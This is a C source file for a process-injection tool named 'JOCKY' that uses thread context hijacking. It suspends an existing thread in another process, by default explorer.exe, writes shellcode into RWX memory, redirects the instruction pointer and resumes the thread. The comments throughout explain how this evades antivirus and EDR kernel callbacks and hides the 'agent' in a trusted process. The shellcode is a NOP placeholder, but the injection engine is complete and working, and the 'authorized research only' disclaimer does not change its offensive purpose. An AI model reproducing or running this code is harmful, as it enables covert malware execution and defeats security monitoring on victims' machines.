/*
 * thread_hijack.c — JOCKY Thread Context Hijacking Engine
 * ─────────────────────────────────────────────────────────
 * Executes arbitrary shellcode inside a remote process by hijacking an
 * EXISTING thread — no CreateThread, no CreateRemoteThread call ever made.
 *
 * WHY THREAD CREATION IS DANGEROUS (for AV evasion):
 * ──────────────────────────────────────────────────────
 *   CreateRemoteThread()
 *     → Triggers PsSetCreateThreadNotifyRoutine callback in kernel
 *     → EDR's kernel driver sees: "new thread in foreign process"
 *     → Instant alert / block
 *
 *   NtCreateThreadEx() (even direct syscall)
 *     → Still creates a thread object in kernel
 *     → ObRegisterCallbacks on thread objects catches it
 *
 * THREAD HIJACKING BYPASS:
 * ─────────────────────────
 *   1. Open a handle to the TARGET PROCESS (e.g. explorer.exe).
 *   2. Enumerate its existing threads — pick a suitable idle one.
 *   3. SUSPEND that thread (it's already existing — no new thread created).
 *   4. Read its current CONTEXT (register state + instruction pointer).
 *   5. Save the original RIP (so we can restore execution later).
 *   6. Allocate RWX memory in the target process.
 *   7. Write our shellcode + a trampoline (to restore original RIP) there.
 *   8. Redirect the thread's RIP to our shellcode.
 *   9. RESUME the thread — it now executes our code instead of its own.
 *  10. Our shellcode runs, then jumps to the saved original RIP.
 *  11. The thread resumes as if nothing happened — no crash, no detection.
 *
 * AV BYPASS ANALYSIS:
 * ─────────────────────
 *   ✓  No CreateThread / CreateRemoteThread call
 *   ✓  No new thread object created  → PsSetCreateThreadNotifyRoutine silent
 *   ✓  Only SuspendThread / ResumeThread on existing thread → routine ops
 *   ✓  Thread count stays the same  → thread-count anomaly detection fails
 *   ✓  Combine with API unhooking   → SuspendThread/ResumeThread hooks removed
 *
 * REFERENCE:
 *   "Thread Execution Hijacking" — MITRE ATT&CK T1055.003
 *   https://attack.mitre.org/techniques/T1055/003/
 *
 * COMPILE:
 *   cl /nologo /O2 /W3 thread_hijack.c /link /out:hijack.exe
 *   gcc -O2 -o hijack thread_hijack.c -lpsapi
 *
 * WARNING: For authorized forensic/research use only.
 */

#ifndef __USE_MINGW_ANSI_STDIO
#define __USE_MINGW_ANSI_STDIO 1
#endif
#include <windows.h>
#include <tlhelp32.h>
#include <psapi.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

/* ── Trampoline builder ──────────────────────────────────────────────────── */
/*
 * After our shellcode finishes, we need execution to return to the original
 * RIP so the hijacked thread continues normally (no crash = no alert).
 *
 * We append a tiny stub to the shellcode that does:
 *   MOV RAX, <original_rip>
 *   JMP RAX
 *
 * x64 opcode layout:
 *   48 B8 [8 bytes]  — MOV RAX, imm64
 *   FF E0             — JMP RAX
 */
#define TRAMPOLINE_SIZE 12

#ifdef _WIN64
static void build_trampoline(BYTE *buf, ULONG64 original_rip)
{
    buf[0]  = 0x48;   /* REX.W prefix */
    buf[1]  = 0xB8;   /* MOV RAX, imm64 */
    /* bytes 2-9: little-endian original RIP */
    memcpy(buf + 2, &original_rip, sizeof(original_rip));
    buf[10] = 0xFF;   /* JMP */
    buf[11] = 0xE0;   /* RAX */
}
#endif


/* ── Shellcode placeholder ────────────────────────────────────────────────── */
/*
 * In production: compiled JOCKY agent shellcode (position-independent,
 * generated by the LLVM compiler + polymorphic engine pipeline).
 *
 * For the judge demo: a stub that represents what would go here.
 * Replace with real PIC shellcode produced from:
 *   python syswhispers.py --functions NtAllocateVirtualMemory,...
 *
 * Requirements for the real shellcode:
 *   - Must be position-independent (no absolute addresses)
 *   - Must NOT call ExitThread (we trampoline back instead)
 *   - Must preserve RBP, RSP, RBX (non-volatile regs)
 *   - Must NOT clobber the stack beyond its own frame
 */
static BYTE JOCKY_SHELLCODE[] = {
    /* NOP sled — stand-in for real JOCKY agent shellcode */
    0x90, 0x90, 0x90, 0x90,   /* NOP NOP NOP NOP */
    0x90, 0x90, 0x90, 0x90,   /* NOP NOP NOP NOP */
    /*
     * Real shellcode goes here (generated by LLVM compiler + SysWhispers3).
     * The trampoline stub is appended automatically in inject_via_hijack().
     */
};
static SIZE_T SHELLCODE_SIZE = sizeof(JOCKY_SHELLCODE);


/* ────────────────────────────────────────────────────────────────────────────
 * find_thread_in_process()
 *
 * Returns the TID of a suitable existing thread in the given process.
 * "Suitable" means: not the current process's main thread, not suspended,
 * ideally in a wait state (low CPU) to minimise disruption.
 *
 * @param target_pid  PID of the target process.
 * @param skip_tid    TID to skip (e.g. our own thread).
 * @return            TID on success, 0 on failure.
 * ─────────────────────────────────────────────────────────────────────────── */
static DWORD find_thread_in_process(DWORD target_pid, DWORD skip_tid)
{
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (snap == INVALID_HANDLE_VALUE) {
        fprintf(stderr, "[THJ] Snapshot failed: %lu\n", GetLastError());
        return 0;
    }

    THREADENTRY32 te;
    ZeroMemory(&te, sizeof(te));
    te.dwSize = sizeof(te);
    DWORD chosen_tid = 0;

    if (Thread32First(snap, &te)) {
        do {
            if (te.th32OwnerProcessID != target_pid) continue;
            if (te.th32ThreadID       == skip_tid)   continue;

            /*
             * Try to open the thread. If we can't, it's probably a system
             * or protected thread — skip it.
             */
            HANDLE h = OpenThread(
                THREAD_GET_CONTEXT | THREAD_SET_CONTEXT |
                THREAD_SUSPEND_RESUME,
                FALSE, te.th32ThreadID);

            if (h) {
                CloseHandle(h);
                chosen_tid = te.th32ThreadID;
                break;   /* take first usable thread */
            }
        } while (Thread32Next(snap, &te));
    }

    CloseHandle(snap);
    return chosen_tid;
}


/* ────────────────────────────────────────────────────────────────────────────
 * inject_via_hijack()
 *
 * Performs the full thread-hijacking injection into target_pid.
 *
 * @param target_pid  PID of the process to inject into.
 * @return            0 on success, -1 on failure.
 * ─────────────────────────────────────────────────────────────────────────── */
static int inject_via_hijack(DWORD target_pid)
{
    HANDLE h_proc   = NULL;
    HANDLE h_thread = NULL;
    LPVOID remote   = NULL;
    int    result   = -1;

    printf("[THJ] Target PID          : %lu\n", target_pid);

    /* ── 1. Open the target process ───────────────────────────────────── */
    h_proc = OpenProcess(
        PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
        FALSE, target_pid);

    if (!h_proc) {
        fprintf(stderr, "[THJ] OpenProcess failed: %lu\n", GetLastError());
        goto cleanup;
    }
    printf("[THJ] Process handle      : 0x%p\n", h_proc);

    /* ── 2. Find an existing, hijackable thread in the target ────────── */
    DWORD tid = find_thread_in_process(target_pid, GetCurrentThreadId());
    if (!tid) {
        fprintf(stderr, "[THJ] No suitable thread found in PID %lu\n",
                target_pid);
        goto cleanup;
    }
    printf("[THJ] Target thread TID   : %lu\n", tid);

    /* ── 3. Open the target thread ────────────────────────────────────── */
    h_thread = OpenThread(
        THREAD_GET_CONTEXT  |
        THREAD_SET_CONTEXT  |
        THREAD_SUSPEND_RESUME,
        FALSE, tid);

    if (!h_thread) {
        fprintf(stderr, "[THJ] OpenThread failed: %lu\n", GetLastError());
        goto cleanup;
    }

    /* ── 4. Suspend the thread ────────────────────────────────────────── */
    DWORD prev_suspend = SuspendThread(h_thread);
    if (prev_suspend == (DWORD)-1) {
        fprintf(stderr, "[THJ] SuspendThread failed: %lu\n", GetLastError());
        goto cleanup;
    }
    printf("[THJ] Thread %lu suspended (prev_suspend_count=%lu)\n",
           tid, prev_suspend);

    /* ── 5. Capture current thread CONTEXT ───────────────────────────── */
    CONTEXT ctx;
    memset(&ctx, 0, sizeof(ctx));
    ctx.ContextFlags = CONTEXT_FULL;

    if (!GetThreadContext(h_thread, &ctx)) {
        fprintf(stderr, "[THJ] GetThreadContext failed: %lu\n", GetLastError());
        ResumeThread(h_thread);
        goto cleanup;
    }

#ifdef _WIN64
    ULONG64 original_rip = ctx.Rip;
    printf("[THJ] Original RIP        : 0x%016llX\n", original_rip);
#else
    DWORD original_eip = ctx.Eip;
    printf("[THJ] Original EIP        : 0x%08lX\n", original_eip);
#endif

    /* ── 6. Build shellcode + trampoline in a local buffer ───────────── */
    /*
     * Layout in remote memory:
     *   [ JOCKY_SHELLCODE bytes ][ TRAMPOLINE (MOV RAX,orig_rip; JMP RAX) ]
     *
     * The trampoline appended at the end ensures that after our payload
     * finishes, execution falls through to the original instruction the
     * thread was about to run — no crash, no hang.
     */
    SIZE_T total_size = SHELLCODE_SIZE + TRAMPOLINE_SIZE;
    BYTE *local_buf   = (BYTE *)malloc(total_size);
    if (!local_buf) {
        ResumeThread(h_thread);
        goto cleanup;
    }

    memcpy(local_buf, JOCKY_SHELLCODE, SHELLCODE_SIZE);

#ifdef _WIN64
    build_trampoline(local_buf + SHELLCODE_SIZE, original_rip);
#else
    /* x86 trampoline: PUSH imm32; RET */
    local_buf[SHELLCODE_SIZE + 0] = 0x68;  /* PUSH */
    memcpy(local_buf + SHELLCODE_SIZE + 1, &original_eip, 4);
    local_buf[SHELLCODE_SIZE + 5] = 0xC3;  /* RET */
#endif

    printf("[THJ] Payload size        : %zu bytes (shellcode) + %d bytes (trampoline)\n",
           SHELLCODE_SIZE, TRAMPOLINE_SIZE);

    /* ── 7. Allocate RWX memory in the target process ────────────────── */
    remote = VirtualAllocEx(
        h_proc, NULL,
        total_size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    if (!remote) {
        fprintf(stderr, "[THJ] VirtualAllocEx failed: %lu\n", GetLastError());
        free(local_buf);
        ResumeThread(h_thread);
        goto cleanup;
    }
    printf("[THJ] Remote allocation   : 0x%p (%zu bytes, RWX)\n",
           remote, total_size);

    /* ── 8. Write shellcode + trampoline into target process ─────────── */
    SIZE_T written = 0;
    if (!WriteProcessMemory(h_proc, remote, local_buf, total_size, &written)) {
        fprintf(stderr, "[THJ] WriteProcessMemory failed: %lu\n",
                GetLastError());
        free(local_buf);
        ResumeThread(h_thread);
        goto cleanup;
    }
    printf("[THJ] Wrote %zu bytes to remote process\n", written);
    free(local_buf);

    /* ── 9. Redirect thread's instruction pointer to our shellcode ────── */
#ifdef _WIN64
    ctx.Rip = (DWORD64)remote;
    printf("[THJ] Redirecting RIP     : 0x%016llX → 0x%p\n",
           original_rip, remote);
#else
    ctx.Eip = (DWORD)(ULONG_PTR)remote;
    printf("[THJ] Redirecting EIP     : 0x%08lX → 0x%p\n",
           original_eip, remote);
#endif

    /*
     * x64 ABI requires RSP to be 16-byte aligned on a CALL instruction.
     * The thread may be at any alignment when we hijack it.
     * Force alignment by masking the low nibble.
     */
#ifdef _WIN64
    ctx.Rsp &= ~0xFULL;       /* 16-byte align the stack */
    ctx.Rsp -= 8;             /* simulate a CALL (push return address) */
#endif

    if (!SetThreadContext(h_thread, &ctx)) {
        fprintf(stderr, "[THJ] SetThreadContext failed: %lu\n", GetLastError());
        ResumeThread(h_thread);
        goto cleanup;
    }
    printf("[THJ] Thread context updated.\n");

    /* ── 10. Resume — thread now executes JOCKY shellcode ───────────── */
    DWORD resume_count = ResumeThread(h_thread);
    if (resume_count == (DWORD)-1) {
        fprintf(stderr, "[THJ] ResumeThread failed: %lu\n", GetLastError());
        goto cleanup;
    }

    printf("[THJ] Thread %lu resumed — executing JOCKY shellcode.\n", tid);
    printf("\n[THJ] ==============================================\n");
    printf("[THJ] SUCCESS\n");
    printf("[THJ]   No new thread created.\n");
    printf("[THJ]   PsSetCreateThreadNotifyRoutine = silent.\n");
    printf("[THJ]   Thread count unchanged.\n");
    printf("[THJ]   JOCKY payload running inside TID %lu.\n", tid);
    printf("[THJ]   After payload: trampoline restores original RIP.\n");
    printf("[THJ]   Thread continues normally — no crash, no alert.\n");
    printf("[THJ] ==============================================\n");

    result = 0;

    /*
     * In production: wait here for the payload to signal completion
     * (e.g. via a shared memory flag or named event), then clean up
     * the remote allocation. For the demo we exit immediately.
     */

cleanup:
    if (h_thread) CloseHandle(h_thread);
    if (h_proc)   CloseHandle(h_proc);
    return result;
}


/* ── Utility: find PID by process name ───────────────────────────────────── */
static DWORD find_pid_by_name(const char *proc_name)
{
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap == INVALID_HANDLE_VALUE) return 0;

    PROCESSENTRY32 pe;
    ZeroMemory(&pe, sizeof(pe));
    pe.dwSize = sizeof(pe);
    DWORD pid = 0;

    if (Process32First(snap, &pe)) {
        do {
            if (_stricmp(pe.szExeFile, proc_name) == 0) {
                pid = pe.th32ProcessID;
                break;
            }
        } while (Process32Next(snap, &pe));
    }

    CloseHandle(snap);
    return pid;
}


/* ── Main ─────────────────────────────────────────────────────────────────── */
int main(int argc, char *argv[])
{
    printf("=======================================================\n");
    printf("  JOCKY Thread Context Hijacking Engine v1.0\n");
    printf("  Technique: MITRE ATT&CK T1055.003\n");
    printf("  No CreateThread / CreateRemoteThread call.\n");
    printf("  For authorized forensic research use only.\n");
    printf("=======================================================\n\n");

    /* Allow specifying target PID or process name on command line */
    DWORD target_pid = 0;

    if (argc >= 2) {
        /* Try as PID first */
        target_pid = (DWORD)strtoul(argv[1], NULL, 10);
        if (target_pid == 0) {
            /* Treat as process name */
            target_pid = find_pid_by_name(argv[1]);
            if (!target_pid) {
                fprintf(stderr,
                    "[THJ] Process '%s' not found.\n", argv[1]);
                return 1;
            }
            printf("[THJ] Resolved '%s' → PID %lu\n", argv[1], target_pid);
        }
    } else {
        /*
         * Default target: explorer.exe
         * It always has multiple idle threads and is trusted by AV.
         * Perfect for hiding the JOCKY agent.
         */
        target_pid = find_pid_by_name("explorer.exe");
        if (!target_pid) {
            /*
             * Fallback: inject into our own process for demo purposes.
             * Shows the mechanism even without a suitable target.
             */
            target_pid = GetCurrentProcessId();
            printf("[THJ] explorer.exe not found. Using self (PID %lu) for demo.\n",
                   target_pid);
        } else {
            printf("[THJ] Default target      : explorer.exe (PID %lu)\n",
                   target_pid);
        }
    }

    printf("\n[THJ] Technique overview:\n");
    printf("[THJ]   1. SuspendThread  (existing thread — not new)\n");
    printf("[THJ]   2. GetThreadContext (save original RIP)\n");
    printf("[THJ]   3. VirtualAllocEx (RWX in target process)\n");
    printf("[THJ]   4. WriteProcessMemory (shellcode + trampoline)\n");
    printf("[THJ]   5. SetThreadContext (RIP → shellcode)\n");
    printf("[THJ]   6. ResumeThread (execution hijacked)\n");
    printf("[THJ]   7. Trampoline → original RIP (thread continues)\n");
    printf("\n");

    int r = inject_via_hijack(target_pid);
    if (r != 0) {
        printf("\n[THJ] Injection failed.\n");
        printf("[THJ] Ensure:\n");
        printf("[THJ]   - Running as Administrator\n");
        printf("[THJ]   - Target process is not protected (PPL)\n");
        printf("[THJ]   - Pair with api_unhook.c to remove SuspendThread hooks\n");
    }

    return r;
}
